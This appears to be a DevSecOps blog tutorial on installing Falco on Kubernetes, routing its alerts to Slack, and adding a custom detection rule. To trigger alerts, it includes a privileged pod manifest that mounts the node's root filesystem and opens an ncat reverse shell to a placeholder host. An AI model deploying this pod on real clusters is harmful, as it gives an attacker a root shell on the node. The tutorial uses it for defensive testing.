Kubernetes Falco deployment and Slack integration — DevSecOps

Süleyman Kütükoğlu
5 min read · Dec 9, 2022


Today, we will install Falco on our Kubernetes cluster and set up an architecture where we can receive security notifications via Slack.

First of all, what is Falco?

Falco is the open source standard for real-time detection of threats and anomalies across containers, Kubernetes, and cloud services.

You can edit the rules that trigger Falco as you wish. For example, it can detect suspicious Kubernetes API requests, unexpected access to your applications (such as someone opening a shell in your PostgreSQL operator pod via kubectl exec /bin/sh), or operating-system-level operations on your worker/master nodes (such as unexpected file creation under a node’s /etc folder), and notify you instantly.

What is Slack?

Slack is a program built for team communication, as opposed to general-purpose messaging applications. Anyone added to a channel can access the files, announcements and other content shared in it.
In this project, we will send the alerts we detect with Falco to a Slack channel. This way we can monitor any suspicious activity in our Kubernetes cluster on mobile/web/desktop at any time.

Slack channel creation and configuration

Before we move on to Falco setup, we need to create a Slack channel that Falco can use.

After logging in/registering on Slack, click the “CREATE A NEW WORKSPACE” button from the bar below.

Assign a name to the Workspace and click the “Next” button.

We continue with the “Skip this step” option without inviting anyone to the team for the demo.

After filling the description part, we complete our workspace creation process with the “Next” button.

Then we create a channel to receive Falco notifications.

Now we go to https://api.slack.com and click the “Create an app” button to create an endpoint where Falco can send alerts.

We continue with the “From scratch” option.

After assigning a name to our application, we select the workspace we have just created and click the “Create App” button.

Click on “Incoming Webhooks” on the page.

We activate the feature by clicking “Off”.

Click on “Add New Webhook to Workspace”.

We select the channel we created for Falco alerts and click the “Allow” button.

Our endpoint is ready. We will use the Endpoint URL address a little later when installing Falco with helm.

Falco setup

We can quickly set up our Falco through Helm.

Run the following command after replacing the “<Webhook URL>” placeholder with the URL we created in the previous step.

helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

helm install falco -n falco falcosecurity/falco \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set auditLog.enabled=true \
--set falco.jsonOutput=true \
--set falco.fileOutput.enabled=true \
--create-namespace \
--set falcosidekick.config.slack.webhookurl="<Webhook URL>"

After running the command, the output of the command “kubectl get pod -n falco” should be as follows.

Falco deployed successfully. Now let’s test if the rules work.

Access to Worker/Master directories

Now I will create a file under the /etc folder of my master1 node and we will get a critical notification on the Slack channel instantly.

After running the command, we received a notification on our Slack channel at the “Error” level, including the details of the operation that was performed.

Running a malicious application

Now let’s run a malicious POD with unnecessary privileges on our Kubernetes cluster and then examine Falco alerts.

The YAML file of the POD we will run:

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-revshell-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: raesene/ncat
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /

After running the POD, dozens of notifications like the one below popped up on the Slack channel.

Even if you are not at your computer, you can receive all notifications with the Slack application that you will install on your phone.

By default, Falco comes with rules that can detect many suspicious activities, but you can create your own rules and have a more secure Kubernetes cluster.
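As an added example of such a custom rule (this is not from the original article or the Falco project; it is written here to show the shape of a rule), the values file below loads one extra rule through the Falco Helm chart. It assumes the chart’s customRules value is used to ship the rule file and that the default ruleset is still loaded, since the rule reuses the default spawned_process and container macros. The rule covers the case mentioned earlier in the article: a shell being opened inside a PostgreSQL container, for example via kubectl exec.

```yaml
# custom-rules-values.yaml (added example, not part of the original post)
# Loaded with:
#   helm upgrade falco falcosecurity/falco -n falco --reuse-values -f custom-rules-values.yaml
customRules:
  custom-rules.yaml: |-
    # Hypothetical macro: the interactive shells we care about.
    - macro: shell_procs
      condition: proc.name in (sh, bash, dash, zsh, ash)

    # Hypothetical rule for the "kubectl exec into the postgres pod" case
    # described in the article. spawned_process and container are macros
    # from Falco's default ruleset (assumed to be loaded).
    - rule: Shell Spawned in Database Container
      desc: A shell was started inside a container whose image looks like PostgreSQL
      condition: >
        spawned_process and container
        and shell_procs
        and container.image.repository contains postgres
      output: >
        Shell in database container
        (user=%user.name command=%proc.cmdline container=%container.name
        image=%container.image.repository pod=%k8s.pod.name ns=%k8s.ns.name)
      priority: WARNING
      tags: [container, shell, custom]
```

Because the Slack output is delivered by Falcosidekick, the priority you choose here is what decides whether the alert is forwarded: Falcosidekick only forwards events at or above the configured minimum priority for the Slack output, so a rule set to NOTICE would be filtered out if the Slack minimum is WARNING. After applying the values file, the new rule appears in the Falco pod log on startup, and you can verify it with the same kubectl exec test described earlier.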

Falco Rules

I hope you enjoyed reading and trying it out.
See you in the next article :)


